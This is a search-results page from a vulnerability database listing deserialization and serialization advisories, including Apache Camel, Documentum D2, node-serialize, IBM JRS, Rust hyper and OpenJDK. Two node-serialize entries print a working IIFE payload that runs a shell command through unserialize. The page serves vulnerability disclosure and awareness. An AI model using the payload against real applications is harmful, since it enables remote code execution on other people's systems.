4266 matches found
CVE-2017-3159
Apache Camel's camel-snakeyaml component is vulnerable to Java object de-serialization vulnerability. De-serializing untrusted data can lead to security flaws...
Design/Logic Flaw
Apache Camel's camel-snakeyaml component is vulnerable to Java object de-serialization vulnerability. De-serializing untrusted data can lead to security flaws...
CVE-2017-3159
Apache Camel's camel-snakeyaml component is vulnerable to Java object de-serialization vulnerability. De-serializing untrusted data can lead to security flaws...
CVE-2017-3159
CVE-2017-3159 affects Apache Camel's camel-snakeyaml component, enabling Java deserialization that can lead to remote code execution when untrusted data is deserialized. The NVD entry assigns a high/critical impact (CVSS v3 base 9.8, NETWORK/LOW complexity, no authentication) with potential execu...
CVE-2017-3159
Apache Camel's camel-snakeyaml component is vulnerable to Java object de-serialization vulnerability. De-serializing untrusted data can lead to security flaws...
OpenText Documentum D2 4.x Remote Code Execution
CVE Identifier: CVE-2017-5586 Vendor: OpenText Affected products: Documentum D2 version 4.x Researcher: Andrey B. Panfilov Severity Rating: CVSS v3 Base Score: 10.0 AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H Description: Document D2 contains vulnerable BeanShell bsh and Apache Commons libraries and...
Google Android - Inter-process munmap in android.util.MemoryIntArray Vulnerability
Exploit for Android platform in category dos / poc Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1001 The MemoryIntArray class allows processes to share an in-memory array of integers by transferring an ashmem file descriptor. As the class implements the Parcelable interface, ...
Node.js 模块 node-serialize 反序列化任意代码执行漏洞
原文链接:Exploiting Node.js deserialization bug for Remote Code Execution 有增改 原作者:Ajin Abraham 译:Holic 知道创宇404安全实验室 tl;dr 若不可信的数据传入 unserialize 函数,通过传递立即调用函数表达式(IIFE)的 JavaScript 对象可以实现任意代码执行。 漏洞详情 审计 Node.js 代码时,我正好看到一个名为 node-serialize 的序列号/反序列化模块。下面是一段代码示例,来自网络请求的 cookie 会传递到该模块的 unserialize 函数中。...
Code injection
An issue was discovered in the node-serialize package 0.0.4 for Node.js. Untrusted data passed into the unserialize function can be exploited to achieve arbitrary code execution by passing a JavaScript Object with an Immediately Invoked Function Expression IIFE...
Code Execution through IIFE
Overview Affected versions of node-serialize can be abused to execute arbitrary code via an immediately invoked function expression IIFE if untrusted user input is passed into unserialize. Recommendation There is no direct patch for this issue. The package author has reviewed this advisory, and...
CVE-2016-8749
It was found that Apache Camel's camel-jackson and camel-jacksonxml components are vulnerable to Java object de-serialisation vulnerability. Camel allows such a type through the 'CamelJacksonUnmarshalType' property. De-serializing untrusted data can lead to security flaws as demonstrated in vario...
Node.JS - node-serialize Remote Code Execution
Node.JS - node-serialize Remote Code Execution var serialize = require'node-serialize'; var payload = '"rce":"$$NDFUNC$$function require'childprocess'.exec'ls /', functionerror, stdout, stderr console.logstdout ;"'; serialize.unserializepayload;...
Node.JS - 'node-serialize' Remote Code Execution
var serialize = require'node-serialize'; var payload = '"rce":"$$NDFUNC$$function require'childprocess'.exec'ls /', functionerror, stdout, stderr console.logstdout ;"'; serialize.unserializepayload;...
CVE-2016-5898
IBM Jazz Reporting Service JRS could allow a remote attacker to obtain sensitive information, caused by not restricting JSON serialization. By sending a direct request, an attacker could exploit this vulnerability to obtain sensitive information...
CVE-2016-5898
IBM Jazz Reporting Service JRS could allow a remote attacker to obtain sensitive information, caused by not restricting JSON serialization. By sending a direct request, an attacker could exploit this vulnerability to obtain sensitive information...
Information disclosure
IBM Jazz Reporting Service JRS could allow a remote attacker to obtain sensitive information, caused by not restricting JSON serialization. By sending a direct request, an attacker could exploit this vulnerability to obtain sensitive information...
CVE-2016-5898
IBM Jazz Reporting Service JRS could allow a remote attacker to obtain sensitive information, caused by not restricting JSON serialization. By sending a direct request, an attacker could exploit this vulnerability to obtain sensitive information...
RUSTSEC-2017-0002 headers containing newline characters can split messages
Serializing of headers to the socket did not filter the values for newline bytes \r or \n, which allowed for header values to split a request or response. People would not likely include newlines in the headers in their own applications, so the way for most people to exploit this is if an...
headers containing newline characters can split messages
Serializing of headers to the socket did not filter the values for newline bytes \r or \n, which allowed for header values to split a request or response. People would not likely include newlines in the headers in their own applications, so the way for most people to exploit this is if an...
Oracle OpenJDK Runtime Environment Build 1.8.0_112-b15 Denial Of Service
Application: Java SE Vendor: Oracle Bug: DoS Reported: 23.12.2016 Vendor response: 24.12.2016 Date of Public Advisory: 17.01.2017 Reference: Oracle CPU Jan 2017 Author: Roman Shalymov 1. ADVISORY INFORMATION Title: Oracle OpenJDK - Java Serialization DoS Advisory ID: ERPSCAN-17-006 Risk: High...